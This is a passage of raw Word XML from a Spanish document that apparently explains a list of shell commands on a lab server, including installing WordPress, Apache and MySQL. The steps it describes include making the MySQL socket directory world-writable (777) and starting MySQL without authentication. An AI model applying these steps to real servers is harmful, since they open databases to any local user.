          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Muestra el directorio actual donde está posicionado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C06C235" w14:textId="168B8B28" w:rsidR="00AA7FAD" w:rsidRPr="00307836" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Si ejecuto este comando, es que estoy fuera de la consola, pudiendo ser un path transversal o entrar en la consola </w:t>
      </w:r>
      <w:r w:rsidR="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sin saber la ruta donde uno se sitúa, como en Metaexploitable</w:t>
      </w:r>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A556A1C" w14:textId="696BA778" w:rsidR="00AA7FAD" w:rsidRPr="00307836" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Copia los ficheros </w:t>
      </w:r>
      <w:r w:rsidR="00763EFB" w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>de la ubicación actual</w:t>
      </w:r>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> al nivel superior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D47B95" w14:textId="26787FA2" w:rsidR="00AA7FAD" w:rsidRPr="00307836" w:rsidRDefault="00307836">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidR="00AA7FAD" w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">ealiza una serie de acciones y extrae </w:t>
      </w:r>
      <w:r w:rsidR="00A703AB" w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>WordPress</w:t>
      </w:r>
      <w:r w:rsidR="00AA7FAD" w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, lo instala.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5795BA93" w14:textId="1B9D0B7C" w:rsidR="00AA7FAD" w:rsidRPr="00307836" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Instala de nuevo </w:t>
      </w:r>
      <w:r w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Apache</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Apache: Software de servidor web de código abierto ampliamente utilizado.</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>"</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26238321" w14:textId="26CF125E" w:rsidR="00AA7FAD" w:rsidRPr="00307836" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Vuelve a ejecutar </w:t>
      </w:r>
      <w:r w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>MySQL: Sistema de gestión de bases de datos relacional de código abierto."</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00527111" w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>com</w:t>
      </w:r>
      <w:r w:rsidR="00527111" w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="000B7784">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>root: En sistemas Unix y Linux, el usuario con acceso total al sistema.</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>"</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6A47C7" w14:textId="014D2F60" w:rsidR="00AA7FAD" w:rsidRPr="00307836" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Se mueve a la ubicación donde se publican webs y es accesible por el puerto 80 </w:t>
      </w:r>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>/va</w:t>
      </w:r>
      <w:r w:rsidR="00527111" w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>/html/www</w:t>
      </w:r>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77507F5F" w14:textId="091F3558" w:rsidR="00AA7FAD" w:rsidRPr="00307836" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Cambia permisos a </w:t>
      </w:r>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>/var/rin/mysqld</w:t>
      </w:r>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> a drxwrxwrxw (777).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663356CC" w14:textId="7868925E" w:rsidR="00AA7FAD" w:rsidRPr="00307836" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Poner que </w:t>
      </w:r>
      <w:r w:rsidR="00763EFB" w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>todos los usuarios</w:t>
      </w:r>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> puedan hacer lo que quieran con el servicio de </w:t>
      </w:r>
      <w:r w:rsidR="00763EFB" w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>MySQL: Sistema de gestión de bases de datos relacional de código abierto."</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>es dar "barra libre".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A95B08A" w14:textId="08FBB08D" w:rsidR="00AA7FAD" w:rsidRPr="00307836" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Busca ficheros multimedia.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA29592" w14:textId="1F7D4332" w:rsidR="00AA7FAD" w:rsidRPr="00307836" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Conecta </w:t>
      </w:r>
      <w:r w:rsidR="00763EFB" w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>MySQL: Sistema de gestión de bases de datos relacional de código abierto."</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">con </w:t>
      </w:r>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="000B7784">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>root: En sistemas Unix y Linux, el usuario con acceso total al sistema.</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>"</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6750CA0B" w14:textId="303ADE41" w:rsidR="00AA7FAD" w:rsidRPr="00307836" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Inicia </w:t>
      </w:r>
      <w:r w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>MySQL: Sistema de gestión de bases de datos relacional de código abierto."</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>en modo seguro sin tener que autenticar.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2163F731" w14:textId="1382D757" w:rsidR="00AA7FAD" w:rsidRPr="00307836" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Reinicia </w:t>
      </w:r>
      <w:r w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Apache</w:t>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Apache: Software de servidor web de código abierto ampliamente utilizado."</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">y arranca </w:t>
      </w:r>
      <w:r w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>MySQL: Sistema de gestión de bases de datos relacional de código abierto.</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>"</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130EDB8F" w14:textId="7BA3DDD2" w:rsidR="00AA7FAD" w:rsidRPr="00307836" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Revisa Access.log y las 100 ultimas de </w:t>
      </w:r>
      <w:r w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>syslog</w:t>
      </w:r>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
